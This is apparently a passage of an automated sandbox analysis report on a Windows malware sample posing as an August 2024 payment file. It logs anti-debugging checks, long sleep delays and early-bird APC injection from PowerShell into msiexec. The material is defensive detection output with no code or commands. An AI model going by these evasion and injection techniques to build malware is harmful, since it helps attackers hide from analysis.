Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598016	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597469	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597141	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597016	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596891	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596232	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596016	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595891	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595766	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595547	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595219	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595109	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594890	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594672	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594562	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7672			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2015			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7568	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -33204139332677172s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8028	Thread sleep count: 637 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8028	Thread sleep count: 9213 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -599546s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -598890s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -598672s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -598562s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -598344s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -598234s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -598125s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -598016s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -597797s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -597687s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -597578s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -597469s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -597359s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -597250s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -597141s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -597016s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -596891s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -596781s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -596672s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -596562s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -596453s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -596344s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -596232s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -596125s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -596016s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -595891s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -595766s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -595656s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -595547s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -595437s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -595328s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -595219s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -595109s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -595000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -594890s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -594781s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -594672s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024	Thread sleep time: -594562s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe	Code function: 0_2_00406033 FindFirstFileA,FindClose,	0_2_00406033
Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe	Code function: 0_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_004055D1
Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe	Code function: 0_2_00402688 FindFirstFileA,	0_2_00402688

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598016	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597469	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597141	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597016	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596891	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596232	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596016	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595891	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595766	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595547	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595219	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595109	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594890	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594672	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594562	Jump to behavior

Source: msiexec.exe, 00000004.00000002.4115622500.00000000007EA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4115622500.000000000084F000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe	API call chain: ExitProcess graph end node			graph_0-3249
Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe	API call chain: ExitProcess graph end node			graph_0-3401

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3C40000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
